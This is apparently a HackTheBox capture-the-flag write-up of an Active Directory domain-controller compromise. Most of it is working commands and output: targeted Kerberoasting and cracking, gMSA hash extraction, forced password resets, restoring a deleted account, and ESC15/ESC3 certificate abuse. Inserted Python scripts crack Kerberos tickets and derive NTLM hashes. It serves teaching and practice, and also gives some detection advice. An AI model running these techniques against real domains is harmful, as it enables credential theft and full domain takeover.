HackTheBox TombWatcher

Writeup for HackTheBox TombWatcher

Machine Synopsis

Key exploitation techniques:

  • Active Directory enumeration with BloodHound
  • Targeted Kerberoasting (write access to a user's servicePrincipalName) and offline hash cracking
  • Active Directory Recycle Bin attack to restore deleted users
  • Active Directory Certificate Services (AD CS): application-policy injection into a schema version 1 template (ESC15, CVE-2024-49019), yielding an enrollment-agent certificate that is abused ESC3-style to enroll on behalf of Administrator
  • PKINIT certificate authentication to recover the Administrator NT hash
  • WinRM access via NTLM hash

Enumeration

➜ TombWatcher nmap -p- --min-rate 10000 10.10.11.72
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49693/tcp open  unknown
49694/tcp open  unknown
49696/tcp open  unknown
49714/tcp open  unknown
49729/tcp open  unknown
49755/tcp open  unknown

➜ TombWatcher nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49693,49694,49696,49714,49729,49755 -sC -sV 10.10.11.72
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
9389/tcp  open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows

tombwatcher.htb and DC01.tombwatcher.htb were added to /etc/hosts:

➜ TombWatcher echo -e '10.10.11.72\t\ttombwatcher.htb DC01.tombwatcher.htb' | sudo tee -a /etc/hosts

Exploitation

Initial Access (Alfred via Kerberoasting)

bloodhound-python was run with the provided credentials (henry / H3nry_987TGV!) to collect Active Directory data. The attacker's clock was first synchronised with the Domain Controller, since Kerberos rejects requests with more than five minutes of skew. The TGT request still failed on name resolution and the collector fell back to NTLM, which was enough to complete the collection.

➜ TombWatcher sudo ntpdate 'dc01.tombwatcher.htb'
➜ TombWatcher sudo bloodhound-python -u 'henry' -p 'H3nry_987TGV!' -d 'tombwatcher.htb' -ns 10.10.11.72 --zip -c All -dc 'dc01.tombwatcher.htb'
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.tombwatcher.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 04S
INFO: Compressing output into 20250621113709_bloodhound.zip

targetedKerberoast.py was run with henry's credentials. Rather than roasting accounts that already have an SPN, it writes a temporary SPN onto every user whose servicePrincipalName attribute the caller can modify, requests a service ticket for it, prints the ticket in hashcat format, and removes the SPN again. The SPN write succeeding on Alfred is itself the finding: henry holds write access to that attribute on Alfred.

➜ TombWatcher git clone https://github.com/ShutdownRepo/targetedKerberoast
➜ TombWatcher python3 targetedKerberoast/targetedKerberoast.py -v -d tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$352f4a7480224626f72065c21fd960e7$7ac36044d03aa36d154d76ecf603e351510673243ea46137e44838aada982141e19f66dc9998a046d32703c2eeeef2f8e03657173a91589a166f33a95fdc590763b8f929bae8e16a06b7d33596e1c2671d85a20746786f1f313d74488bb6ba104c7e3e895afe113fd1374c7a4d03858ead627b9daada9ee65844e551b79d305a6d94c7151720669c7e07a6011aa54d3e46bd650c96196248ce70ee58eb1189837a164932010b712cc904363cc41daefa52d7c79de078edda8ac7e05e1c39433345e280385fb32a1ed8fa33615e81441e486b410e51816868cc2fb0cc91bbdfdb59b2048cbefb05a1dcbc65a33eaa89f5f205f846ba03ac58d9bbb3b8c87a6d8a35f84febecdb0c5876b80853f9016cf8062d4193bf609f7ee9b1de07cca1a62b79cfbbdce9ebd7b3f16e2599ce0d238756a516faa129f3a58238c617f1bbb3777914c4bb7ff15b7470ab1b125af182b266a3015e88a70533eef1bc5d1a9b5bfd83ce610dfd1fa1cc46064e80ca7916f3df78032ae728e31f91a185fa64e30eb847f130d4a271731b3475c3df3c2a8816804e6f55e62e41022f580a91089aa7418c8350cea91013d350cb319996c4288c0e924b095ca34b9941afcfb041c12b114b400720a40d56649db29bb861c6adc8bedf3f0895f3f9ebaeabce182e6cc3430319ff6cb63838461a6efc1efccff2ac06ceb3f41c183334da1b8fbb12889e49a006b47e83e821e3258f7e553df82e1a949c39112e1c9edf3b0ac96e9b4755b51f81e75bbcb7fc23ec519aefa7ab829f49391a716467c8934a3de94c6e9b98b62e96ab41c7b1663bf9f5693cc7122e1b73a3c2195d9e17de3add157ce35376c23357a4920f1cfbe5b4f780d3efb1612f681939870341c3fa27a0cd6a692465182c502c02805ba6e6a90ac7db6f969229de67b8cd76f89837932e7b60cb4092f239f288f90396ce34387f07b27fa32813db7dac9212b77f40e08f84ce1a590e2ccbba906a9b9fad01b4095efbf3c7a887c5ed4ecb5e4ad3f6589ee01a136e13f73b205653463e6c95340e646116383008c0d47e388d9ce5451bf4ed9056ec495fe8a6c39b4be27b0f726770e2a20dad53807895ab0d4e7e93dccec316a0128110c1dc6470954ef494f77d6c67742f38a4b5023775622f4512c6f2144cc01d33860eb0ff22ca29d558ba5dde5aef9a68b326db39b1196b44179d41d2d93564cd3796a9d58b4a0c5973aa9ffe2631e0c446c1b0465831fc8f3611f1f23a89ee7c476954d8fd4e41c9a14a6405af7dbb8bb7161c3e4b935941072a5584a657e1446bd1859055b6be4aa0850296fd8fb8347e42051f28221aa83afd9
3ed7f99f744f621aa1c6ce837779658df38a38f20691fa527cdb49dfafd0cd3984619d9a09b32c1de363603d4122b9c2465f70157278da6623282b532634466391bd6faa860fd42bc1d0eb440dced666af835023979804be3affc4e
[VERBOSE] SPN removed successfully for (Alfred)

The output is Alfred's service ticket in hashcat format: $krb5tgs$23$ marks RC4-HMAC (etype 23), hashcat mode 13100 (Kerberos 5 TGS-REP etype 23). The encrypted part is keyed with Alfred's NT hash, so it can be attacked offline; it was cracked with rockyou.txt.

➜ TombWatcher hashcat -a 0 -m 13100 alfred.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$...:basketball

The password for Alfred was basketball.

With Alfred's own credentials, bloodyAD added Alfred to the Infrastructure group. The command succeeds because Alfred has write access to that group's member attribute (an AddSelf/AddMember-type right in BloodHound terms).

➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'alfred' -p 'basketball' add groupMember Infrastructure alfred
[+] alfred added to Infrastructure

ANSIBLE_DEV$ lives under CN=Managed Service Accounts and carries msDS-ManagedPassword, so it is a group Managed Service Account (gMSA). Its current password can be read by any principal listed in its msDS-GroupMSAMembership (ReadGMSAPassword in BloodHound), which is why Alfred was first added to Infrastructure. bloodyAD reads the blob with Alfred's credentials, decodes it, and prints both the raw 256-byte password (base64) and the NT hash derived from it; the password is random binary and not typable, so the hash is what gets used.

➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'alfred' -p 'basketball' get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:4b21348ca4a9edff9689cdf75cbda439
msDS-ManagedPassword.B64ENCODED: YRowaTv017+Uz2L8SEJ+RJ4IqND8txGK9cqERGZIDrfgJVIt1XFlPG5GWmb29E29EqrtVwlmOWPK1zr7x5QJbMxMFj7nXqjfYwaHn7Fk8YQQl8WVa2A2Xn4RFiNB9KuqJT/iMkXDL9sUAuCnWy3lS8aLCvAS8TPTg/NgMdvg/325btI8bb8vcHUF8ObBNj0Sf6brU2qWtfdRqQA5DzgG8shYzDSFxGm4pd6x2nhKTOojSgQQg5FQBrim7FV/8Mhzp2IkRiwxOPv6FYdGsU3F2op7y0MZGKXpmvGVXVaYfViYHbsd3oK+kSXlkJth9xmkhQWK0jEV3Zf7Odpr0uwnSg==

The NTLM hash 4b21348ca4a9edff9689cdf75cbda439 for ansible_dev$ was retrieved. This hash was used to authenticate via SMB with nxc.

➜ TombWatcher nxc smb tombwatcher.htb -u 'ansible_dev$' -H '4b21348ca4a9edff9689cdf75cbda439'
SMB         10.10.11.72     445    DC01             [+] tombwatcher.htb\ansible_dev$:4b21348ca4a9edff9689cdf75cbda439
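
Both the Kerberoast cracking step and the gMSA hash above come down to the same primitive, the NT hash (MD4 over UTF-16LE bytes). The following is an added example, not code from the writeup, bloodyAD or targetedKerberoast: it implements what hashcat mode 13100 checks for each candidate against an RC4-HMAC ticket (here a ticket constructed locally under the password basketball, since the page's own hash is not reproduced), and it parses a gMSA password blob, constructed here around the 256 password bytes bloodyAD printed for ANSIBLE_DEV$, into the NTLM hash shown above. Standard library only; MD4 is implemented by hand because OpenSSL 3 builds often ship without it.

```python
"""NT-hash plumbing behind two steps above: checking a password candidate
against an RC4-HMAC (etype 23) Kerberoast hash the way hashcat mode 13100
does, and turning a gMSA msDS-ManagedPassword blob into the NTLM hash used for
pass-the-hash. Added example, not code from the writeup, bloodyAD or
targetedKerberoast; standard library only (MD4 is hand-rolled)."""
import base64, hashlib, hmac, struct

MASK = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # RFC 4120 key usage for a ticket enc-part under the service key

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the digest behind the NT hash."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & MASK & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                p = (-i) % 4  # registers are updated in the order A, D, C, B
                t = (v[p] + fn(v[(p + 1) % 4], v[(p + 2) % 4], v[(p + 3) % 4]) + x[idx] + k) & MASK
                s = shifts[i % 4]
                v[p] = ((t << s) | (t >> (32 - s))) & MASK
        a, b, c, d = ((u + w) & MASK for u, w in zip((a, b, c, d), v))
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password; hashcat does this per candidate."""
    return md4(password.encode("utf-16le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def make_krb5tgs23(user, realm, spn, password, ticket_plaintext, confounder):
    """Constructed $krb5tgs$23$ line: RFC 4757 encryption of a fake ticket under
    the service account's NT key (a real one comes out of a TGS-REP)."""
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_TICKET))
    data = confounder + ticket_plaintext
    checksum = _hmac_md5(k1, data)
    edata = rc4(_hmac_md5(k1, checksum), data)  # K3 = HMAC-MD5(K1, checksum)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"

def check_kerberoast_candidate(line: str, password: str) -> bool:
    """One hashcat 13100 guess: K1 from the candidate's NT hash, K3 from the
    checksum, RC4-decrypt, then compare HMAC-MD5 of the plaintext."""
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_TICKET))
    plaintext = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)

# msDS-ManagedPassword.B64ENCODED exactly as bloodyAD printed it above: the 256
# raw UTF-16LE password bytes with their NUL terminator already stripped.
ANSIBLE_DEV_B64 = "YRowaTv017+Uz2L8SEJ+RJ4IqND8txGK9cqERGZIDrfgJVIt1XFlPG5GWmb29E29EqrtVwlmOWPK1zr7x5QJbMxMFj7nXqjfYwaHn7Fk8YQQl8WVa2A2Xn4RFiNB9KuqJT/iMkXDL9sUAuCnWy3lS8aLCvAS8TPTg/NgMdvg/325btI8bb8vcHUF8ObBNj0Sf6brU2qWtfdRqQA5DzgG8shYzDSFxGm4pd6x2nhKTOojSgQQg5FQBrim7FV/8Mhzp2IkRiwxOPv6FYdGsU3F2op7y0MZGKXpmvGVXVaYfViYHbsd3oK+kSXlkJth9xmkhQWK0jEV3Zf7Odpr0uwnSg=="

def build_gmsa_blob(password: bytes) -> bytes:
    """Constructed MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19): 16-byte header,
    NUL-terminated current password, padding to 8 bytes, two interval fields."""
    field = password + b"\x00\x00"
    pad = (-(16 + len(field))) % 8
    query_off = 16 + len(field) + pad
    header = struct.pack("<HHIHHHH", 1, 0, query_off + 16, 16, 0, query_off, query_off + 8)
    return header + field + b"\x00" * pad + struct.pack("<QQ", 0, 0)

def gmsa_current_password(blob: bytes) -> bytes:
    """Walk the blob by its offsets and cut the current password at its NUL code
    unit, checked on a 2-byte boundary rather than by stripping a fixed tail."""
    version, _, _, cur_off, prev_off, query_off, _ = struct.unpack_from("<HHIHHHH", blob)
    if version != 1:
        raise ValueError(f"unexpected blob version {version}")
    field = blob[cur_off:prev_off or query_off]  # PreviousPasswordOffset is 0 when absent
    for i in range(0, len(field) - 1, 2):
        if field[i] == 0 and field[i + 1] == 0:
            return bytes(field[:i])
    raise ValueError("CurrentPassword is not NUL-terminated")

def gmsa_ntlm(blob: bytes) -> str:
    """gMSA passwords are random binary, so the NT hash of the raw bytes is the
    only usable form, via pass-the-hash."""
    return md4(gmsa_current_password(blob)).hex()

def ansible_dev_ntlm() -> str:
    return gmsa_ntlm(build_gmsa_blob(base64.b64decode(ANSIBLE_DEV_B64)))

if __name__ == "__main__":
    print("ansible_dev$ NTLM:", ansible_dev_ntlm())
```

Each RC4-HMAC guess costs two HMAC-MD5 calls and one RC4 pass, which is why etype 23 Kerberoast hashes fall to a wordlist in seconds; AES tickets (etype 17/18, hashcat 19600/19700) need PBKDF2 with 4096 iterations per candidate. That is also the detection and hardening angle: alert on TGS-REQs with RC4 etype for accounts that otherwise use AES, and set msDS-SupportedEncryptionTypes so service accounts do not accept RC4.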

ansible_dev$'s NT hash was then used with bloodyAD to reset sam's password to password!. This needs the ForceChangePassword right (or GenericAll) over sam, which ansible_dev$ evidently holds. A reset, unlike a change, does not require the old password, but it is a loud and irreversible modification on a real engagement.

➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'ansible_dev$' -p ':4b21348ca4a9edff9689cdf75cbda439' set password "sam" 'password!'
[+] Password changed successfully!

sam does not hold GenericAll over john directly; the right being abused is WriteOwner. sam first takes ownership of john (the previous owner was Domain Admins, RID 512), then as the owner grants himself GenericAll, and finally resets john's password to password!.

➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'sam' -p 'password!' set owner 'john' 'sam'
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john

➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'sam' -p 'password!' add genericAll 'john' 'sam'
[+] sam has now GenericAll on john

➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'sam' -p 'password!' set password "john" 'password!'
[+] Password changed successfully!

WinRM access was then established as john with the new password.

➜ TombWatcher nxc winrm tombwatcher.htb -u 'john' -p 'password!'
WINRM       10.10.11.72     5985   DC01             [+] tombwatcher.htb\john:password! (Pwn3d!)

The user.txt flag was retrieved.

➜ TombWatcher evil-winrm -u john -p 'password!' -i tombwatcher.htb
*Evil-WinRM* PS C:\Users\john\Desktop> type user.txt
f28bc84bbd34f6eaccfd703732b7e3d3

Privilege Escalation

Active Directory Recycle Bin Attack & AD CS ESC15 / Enrollment Agent Abuse

The Active Directory Recycle Bin was leveraged to restore a deleted cert_admin account. With the Recycle Bin enabled, a deleted object keeps its attributes (objectSid, group memberships, lastKnownParent) for the deleted-object lifetime and can be brought back intact with Restore-ADObject instead of being reanimated as a stripped tombstone. The restore below succeeding shows john has the rights it needs over the destination OU (the object's lastKnownParent, OU=ADCS). First, the feature status was checked.

*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADOptionalFeature 'Recycle Bin Feature'
DistinguishedName  : CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=tombwatcher,DC=htb
EnabledScopes      : {CN=Partitions,CN=Configuration,DC=tombwatcher,DC=htb, CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=tombwatcher,DC=htb}
FeatureGUID        : 766ddcd8-acd0-445e-f3b9-a7f9b6744f2a
FeatureScope       : {ForestOrConfigurationSet}
IsDisableable      : False
Name               : Recycle Bin Feature
ObjectClass        : msDS-OptionalFeature
ObjectGUID         : 907469ef-52c5-41ab-ad19-5fdec9e45082
RequiredDomainMode :
RequiredForestMode : Windows2008R2Forest

Deleted objects of class user were searched for in the Deleted Objects container; -IncludeDeletedObjects is what makes tombstoned entries visible. The listing is abridged here: more than one deleted cert_admin object exists, and they differ in objectSid and whenChanged, which is what the selection below relies on.

*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADObject -SearchBase "CN=Deleted Objects,DC=tombwatcher,DC=htb" -LDAPFilter "(objectClass=user)" -IncludeDeletedObjects -Properties objectSid, samAccountName, lastKnownParent, whenChanged
...
Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
LastKnownParent   : OU=ADCS,DC=tombwatcher,DC=htb
Name              : cert_admin
ObjectClass       : user
ObjectGUID        : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
objectSid         : S-1-5-21-1392491010-1358638721-2126982587-1109
samAccountName    : cert_admin
whenChanged       : 6/20/2025 3:05:49 PM
...

The entry excerpted above (ObjectGUID f80369c8-…, SID ending in -1109) is not the one that was restored. The object chosen has ObjectGUID 938182c3-bf0b-410a-9aaa-45c8e1a02ebf, and its SID ends in -1111, the SID the WebServer template's ACL grants Enroll to (see the certutil output further down). That object was restored, its password reset to password!, and the account enabled. Restore-ADObject fails if an object with the same RDN already exists under the lastKnownParent, which is another reason to pick the duplicates apart before restoring.

*Evil-WinRM* PS C:\Users\john\Desktop> Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'
*Evil-WinRM* PS C:\Users\john\Desktop> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'password!' -AsPlainText -Force)
*Evil-WinRM* PS C:\Users\john\Desktop> Enable-ADAccount -Identity 'cert_admin'

The restored cert_admin account was confirmed to have SMB and LDAP access.

➜ TombWatcher nxc smb tombwatcher.htb -u 'cert_admin' -p 'password!'
SMB         10.10.11.72     445    DC01             [+] tombwatcher.htb\cert_admin:password!

➜ TombWatcher nxc ldap tombwatcher.htb -u 'cert_admin' -p 'password!'
LDAP        10.10.11.72     389    DC01             [+] tombwatcher.htb\cert_admin:password!
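
The listing earlier can contain several tombstones named cert_admin, and only the copy whose objectSid matches the ACL that matters is worth restoring. The following is an added example, not part of the writeup: it parses the \0ADEL: DN form and picks a tombstone by SID or by recency from records constructed to look like the Get-ADObject output (the entry the page shows plus two hypothetical siblings with made-up GUIDs, SIDs and timestamps). The GUID it returns is what goes to Restore-ADObject -Identity.

```python
"""Telling apart several deleted objects that share a name, as in the Deleted
Objects listing above, so the right one is handed to Restore-ADObject. Added
example, not from the writeup. RECORDS is constructed to look like Get-ADObject
output: the entry the page shows plus two hypothetical siblings whose GUIDs,
SIDs and timestamps are made up."""
import re
from datetime import datetime

# AD renames a deleted object to "<old RDN>\nDEL:<objectGUID>"; in DN form the
# newline is the RFC 4514 escape \0A, which is where "\0ADEL:" comes from.
_DELETED_DN = re.compile(
    r"^CN=(?P<name>.*?)\\0ADEL:(?P<guid>[0-9a-fA-F-]{36}),CN=Deleted Objects,(?P<nc>.+)$")


def parse_deleted_dn(dn: str):
    """Return (original name, objectGUID, naming context) of a tombstone DN."""
    m = _DELETED_DN.match(dn)
    if not m:
        raise ValueError(f"not a Deleted Objects DN: {dn}")
    return m["name"], m["guid"].lower(), m["nc"]


def choose_tombstone(records, name: str, want_sid: str = None) -> str:
    """Pick the deleted object to restore and return its objectGUID. With
    want_sid, take the copy carrying that SID (ACLs reference SIDs, so the SID
    decides which copy is worth restoring); otherwise the most recently changed
    one, which is usually the copy that was deleted last."""
    candidates = []
    for rec in records:
        rec_name, guid, _ = parse_deleted_dn(rec["DistinguishedName"])
        if rec_name.lower() != name.lower():
            continue
        if want_sid and rec["objectSid"] != want_sid:
            continue
        changed = datetime.strptime(rec["whenChanged"], "%m/%d/%Y %I:%M:%S %p")
        candidates.append((changed, guid))
    if not candidates:
        raise LookupError(f"no deleted object named {name!r}"
                          + (f" with SID {want_sid}" if want_sid else ""))
    return max(candidates)[1]


DC = "DC=tombwatcher,DC=htb"
DOMAIN_SID = "S-1-5-21-1392491010-1358638721-2126982587"
RECORDS = [
    {  # the entry shown in the writeup
        "DistinguishedName": f"CN=cert_admin\\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,{DC}",
        "LastKnownParent": f"OU=ADCS,{DC}",
        "objectSid": f"{DOMAIN_SID}-1109",
        "whenChanged": "6/20/2025 3:05:49 PM",
    },
    {  # hypothetical sibling: deleted last, but not the SID the ACL names
        "DistinguishedName": f"CN=cert_admin\\0ADEL:00000000-0000-4000-8000-000000000002,CN=Deleted Objects,{DC}",
        "LastKnownParent": f"OU=ADCS,{DC}",
        "objectSid": f"{DOMAIN_SID}-1110",
        "whenChanged": "6/20/2025 3:06:31 PM",
    },
    {  # hypothetical sibling carrying the SID the WebServer ACL grants Enroll to
        "DistinguishedName": f"CN=cert_admin\\0ADEL:00000000-0000-4000-8000-000000000003,CN=Deleted Objects,{DC}",
        "LastKnownParent": f"OU=ADCS,{DC}",
        "objectSid": f"{DOMAIN_SID}-1111",
        "whenChanged": "6/20/2025 3:05:20 PM",
    },
]

if __name__ == "__main__":
    print("most recent:", choose_tombstone(RECORDS, "cert_admin"))
    print("by SID     :", choose_tombstone(RECORDS, "cert_admin", want_sid=f"{DOMAIN_SID}-1111"))
```

Recency and SID disagree in the constructed data on purpose: restoring "the newest cert_admin" would bring back an account the WebServer ACL does not know, and the later certificate request would be denied.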

certipy find was run with john's credentials to enumerate the CA and its templates (output abridged): one CA, tombwatcher-CA-1, and 11 enabled templates. The template of interest is WebServer, inspected next.

➜ TombWatcher certipy-ad find -target tombwatcher.htb -u 'john' -p 'password!'
[*] Found 33 certificate templates
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'

certutil -template WebServer was run on the target to dump the WebServer template definition and its enrollment ACL (output abridged).

*Evil-WinRM* PS C:\Users\john\Desktop> certutil -template WebServer
TemplatePropCommonName = WebServer
...
Allow Enroll	TOMBWATCHER\Domain Admins
Allow Enroll	TOMBWATCHER\Enterprise Admins
Allow Enroll	S-1-5-21-1392491010-1358638721-2126982587-1111
...

The WebServer template grants Enroll to SID S-1-5-21-1392491010-1358638721-2126982587-1111, which is the restored cert_admin. WebServer is a schema version 1 template, and on a CA without the November 2024 fix for CVE-2024-49019 a version 1 template honours application policies supplied by the requester in the CSR (ESC15, "EKUwu"). cert_admin can therefore obtain a WebServer certificate that carries the Certificate Request Agent application policy. A certificate with that policy is an enrollment-agent certificate, and the rest of the chain is the classic ESC3 enrollment-agent abuse: enroll on behalf of another user. Note that this is not ESC1, which needs a client-authentication template that lets the enrollee supply the subject name; no subject name is supplied here.

First, a WebServer certificate was requested with cert_admin's credentials, injecting the "Certificate Request Agent" application policy. Certipy reports that the result has no identity (no UPN, no object SID), which is expected: this certificate is not for logging in, it is the agent certificate used in the next request.

➜ TombWatcher certipy-ad req -target 'tombwatcher.htb' -u 'cert_admin' -p 'password!' -ca tombwatcher-CA-1 -template WebServer -application-policies "Certificate Request Agent"
[*] Request ID is 20
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Saving certificate and private key to 'cert_admin.pfx'
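
The -application-policies flag works by adding the Microsoft Application Policies extension to the CSR; the CA copies it into the issued certificate because WebServer is a schema version 1 template. The following added example (not code from the writeup or from certipy; standard library only, with the extension and policy OIDs being Microsoft's documented values and the DER helpers written here) encodes that extension the way the request above carries it, decodes it back, and flags the Certificate Request Agent policy, which is the indicator a defender would look for in certificates issued from templates that should never grant it.

```python
"""What certipy's -application-policies flag puts in the CSR: the Microsoft
Application Policies extension (szOID_APPLICATION_CERT_POLICIES). A schema
version 1 template such as WebServer lets the CA copy this requester-supplied
extension into the issued certificate (ESC15), and a certificate carrying the
Certificate Request Agent policy is an enrollment-agent certificate. Added
example, not code from the writeup or certipy; standard library only."""

APPLICATION_POLICIES = "1.3.6.1.4.1.311.21.10"   # extension OID
CERTIFICATE_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
CLIENT_AUTHENTICATION = "1.3.6.1.5.5.7.3.2"
SERVER_AUTHENTICATION = "1.3.6.1.5.5.7.3.1"


def _der_length(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(body)) + body


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def encode_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:  # base-128, high bit set on every byte but the last
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body += bytes(reversed(chunk))
    return _tlv(0x06, bytes(body))


def decode_oid(body: bytes) -> str:
    first = body[0]
    arcs = [2, first - 80] if first >= 80 else [first // 40, first % 40]
    value = 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def encode_application_policies(policy_oids) -> bytes:
    """extnValue: SEQUENCE OF PolicyInformation { policyIdentifier OID }, the
    same syntax as the standard CertificatePolicies extension."""
    return _tlv(0x30, b"".join(_tlv(0x30, encode_oid(o)) for o in policy_oids))


def decode_application_policies(extn_value: bytes):
    tag, seq, _ = _read_tlv(extn_value, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    pos, oids = 0, []
    while pos < len(seq):
        tag, info, pos = _read_tlv(seq, pos)
        t, oid_body, _ = _read_tlv(info, 0)  # policyQualifiers, if any, are ignored
        if tag != 0x30 or t != 0x06:
            raise ValueError("malformed PolicyInformation")
        oids.append(decode_oid(oid_body))
    return oids


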